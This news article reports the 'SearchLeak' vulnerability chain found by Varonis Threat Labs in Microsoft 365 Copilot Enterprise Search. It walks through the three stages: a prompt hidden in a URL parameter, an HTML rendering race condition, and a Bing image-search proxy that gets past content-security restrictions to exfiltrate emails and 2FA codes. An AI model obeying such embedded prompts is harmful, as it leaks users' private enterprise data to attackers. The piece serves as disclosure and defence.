Microsoft Copilot 'SearchLeak' Vulnerability Exposes Sensitive Enterprise Data
Cybersecurity researchers at Varonis Threat Labs have uncovered a new three-stage vulnerability chain, named 'SearchLeak,' affecting Microsoft 365 Copilot Enterprise Search. This exploit reportedly enables attackers to access and exfiltrate sensitive information, including emails, two-factor authentication codes, and various indexed business content. The vulnerability works by combining a novel AI-specific injection with existing web bugs, effectively circumventing Copilot's built-in data protection mechanisms.
A new vulnerability dubbed 'SearchLeak' has been identified in Microsoft 365 Copilot Enterprise Search by cybersecurity researchers at Varonis Threat Labs. The vulnerability chain is described as a method to turn the AI assistant into a "silent data exfiltration weapon."
'SearchLeak' is a three-stage attack that could expose a range of sensitive data, including emails, two-factor authentication codes, meeting invites, notes, SharePoint documents, and OneDrive files. The researchers indicate that the 'blast radius' extends beyond personal data within the enterprise environment, potentially covering any content the user has access to within an organization.
The attack begins with a Parameter-to-Prompt Injection (P2P), an AI-specific vulnerability. An attacker sends a target a URL containing a malicious prompt as a query parameter. When the target clicks this link, Copilot interprets the embedded prompt as instructions, such as searching for emails and embedding their titles into an image URL.
The second stage involves an HTML injection race condition. According to Varonis, a flaw in Copilot's rendering process allows raw HTML to be temporarily displayed in the Document Object Model (DOM) during the streaming phase, before Microsoft's protective formatting is applied.
Finally, to retrieve the exposed information, the attack utilizes a Content Security Policy (CSP) bypass through Bing server-side request forgery (SSRF). The malicious prompt directs Copilot to use an attacker-controlled domain as the image URL destination, leveraging Bing's Search by Image feature as a proxy to circumvent restrictions on external image domains.
Microsoft has implemented safety guardrails in Copilot designed to prevent data exfiltration. However, the 'SearchLeak' vulnerability reportedly operates as a combined three-stage chain, allowing it to bypass these safeguards, whereas individual components of the attack would likely fail on their own. According to Mashable Tech, this mechanism effectively works around Microsoft's built-in protections.
